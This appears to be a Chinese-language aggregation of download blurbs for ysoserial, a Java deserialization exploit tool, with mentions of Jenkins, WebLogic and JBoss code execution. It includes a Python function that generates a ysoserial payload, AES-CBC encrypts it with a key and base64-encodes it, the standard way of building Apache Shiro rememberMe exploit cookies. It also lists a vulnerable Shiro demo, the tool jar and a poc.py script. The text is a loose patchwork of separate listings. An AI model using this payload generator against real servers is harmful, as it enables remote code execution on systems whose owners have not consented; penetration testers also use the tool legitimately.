ysoserial反序列化漏洞的检查工具 ysoserial-v0.0.5.jar 非常好用

shrio反序裂化利用工具，JAVA反序裂化利用工具。 https://github.com/frohoff/ysoserial 源码编辑而来。 def generator(command, fp,key): if not os.path.exists(fp): print('Jar zai na ne ?') raise Exception('jar file not found!') popen = subprocess.Popen(['java', '-jar', fp, 'URLDNS', command], stdout=subprocess.PIPE) BS = AES.block_size pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() mode = AES.MODE_CBC iv = uuid.uuid4().bytes encryptor = AES.new(base64.b64decode(key), mode, iv) file_body = pad(popen.stdout.read()) base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body)) return base64_ciphertext 代码中需要的jar包

java反序列化工具ysoserial最新版v0.0.4 （jenkins，weblogic，jboss等的代码执行利用工具）

github已经不怎么好下载的，作者已经把文件上传到其他的平台，刚刚使用的时候遇到了一点问题，要将原文件名改正确了之后才能用。

约瑟 一种概念证明工具，用于生成利用不安全的Java对象反序列化的有效负载。 描述 最初作为AppSecCali 2015讲座一部分发布，其中包含针对Apache Commons Collections（3.x和4.x），Spring Beans / Core（4.x）和Groovy（ 2.3.x）。 后来进行了更新，以包括其他小工具链和其他几个库。 ysoserial是在通用Java库中发现的实用程序和面向属性的编程“小工具链”的集合，可以在适当的条件下利用Java应用程序对对象执行不安全的反序列化。 主驱动程序接受用户指定的命令，并将其包装在用户指定的小工具链中，然后将这些对象序列化为stdout。 当在类路径上具有必需小工具的应用程序不安全地反序列化此数据时，该链将自动被调用并导致命令在应用程序主机上执行。 应该注意的是，漏洞在于应用程序执行不安全的反序列化，而不是在类路径上具

用于生成利用不安全 Java 对象反序列化的有效负载的概念验证工具。

ysoserial-0.0.6 也可自行下载编译 提供个下载链接：https://jitpack.io/com/github/frohoff/ysoserial/master-v0.0.5-gb617b7b-16/ysoserial-master-v0.0.5-gb617b7b-16.jar

文件目录： * 被攻击网站源码（一个shrio-demo）：samples-web-1.2.4.war * 反序列化工具（神器）：ysoserial-0.0.6-SNAPSHOT-all.jar* * Payload构造小工具（将反序列化payload进行AES加密、Base64编码）：poc.py

ysoserial

ysoserial-0.0.5-all.jar反序列化漏洞利用，jar可以直接使用